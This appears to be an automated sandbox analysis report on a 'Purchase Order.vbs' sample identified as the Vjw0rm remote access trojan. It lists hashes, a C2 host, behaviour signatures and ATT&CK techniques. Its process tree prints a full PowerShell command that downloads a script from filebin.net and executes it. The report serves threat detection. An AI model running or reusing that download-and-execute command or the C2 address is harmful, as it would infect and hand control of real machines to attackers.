Analysis

  • max time kernel
    142s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220414-en
  • submitted
    22-06-2022 17:03

General

  • Target

    Purchase Order.vbs

  • Size

    5KB

  • MD5

    1679b30714601c805ca6c79ffc52013d

  • SHA1

    f450951426f056cc66ce7232a1ea12cbd4f5acd5

  • SHA256

    4144993550833321f6031796034f3afe5fecbcc61fc61bfab403fefba4e6dccc

  • SHA512

    c78233a43e091342bae5e3344e85f2ab21e1e249095b589ccade5e559fd6630ea71ac9319fe5c455d82a568a47a9c54db71da28dfb93df8556c66b8b2db83923

Score
10/10

Malware Config

Extracted

Family

vjw0rm

C2

http://rick63.publicvm.com:1849

Signatures

  • Vjw0rm

    Vjw0rm is a remote access trojan written in JavaScript.

  • Blocklisted process makes network request 5 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Purchase Order.vbs"
    1⤵
    • Blocklisted process makes network request
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:1472
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy RemoteSigned -Command Invoke-WebRequest -Uri 'https://filebin.net/x1d0okkwum9anzzs/SYSWOW64.PS1' -OutFile 'C:\Users\Public\SYSWOW64.PS1'; PowerShell -File C:\Users\Public\SYSWOW64.PS1
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2764
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -File C:\Users\Public\SYSWOW64.PS1
        3⤵
        • Blocklisted process makes network request
        • Drops startup file
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1940

Network

MITRE ATT&CK Matrix ATT&CK v6

Discovery

Query Registry

1
T1012

System Information Discovery

2
T1082

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Public\SYSWOW64.PS1
    Filesize

    3KB

    MD5

    0866c5b72df63add6f9884806682308a

    SHA1

    6b157db9a413b8e7d7c33b8b4a5713cdbf6f4dea

    SHA256

    860cae2ca6d44d8d9a34df314e7b3f1a64116f2ebe6279ed160fc2f0d7ebea95

    SHA512

    bc865a758fa7790e346a7ebb19cd3a3871f7aa16b88b80116bad0846d88104203f81bfd4bf73c46b1d770950c6ff0b48475e313277d51171c42227fe3128b82b

  • memory/1940-133-0x0000000000000000-mapping.dmp
  • memory/1940-135-0x00007FF8E6F20000-0x00007FF8E79E1000-memory.dmp
    Filesize

    10.8MB

  • memory/1940-137-0x00007FF8E6F20000-0x00007FF8E79E1000-memory.dmp
    Filesize

    10.8MB

  • memory/2764-130-0x0000000000000000-mapping.dmp
  • memory/2764-131-0x000001E978E10000-0x000001E978E32000-memory.dmp
    Filesize

    136KB

  • memory/2764-132-0x00007FF8E6F20000-0x00007FF8E79E1000-memory.dmp
    Filesize

    10.8MB

  • memory/2764-136-0x00007FF8E6F20000-0x00007FF8E79E1000-memory.dmp
    Filesize

    10.8MB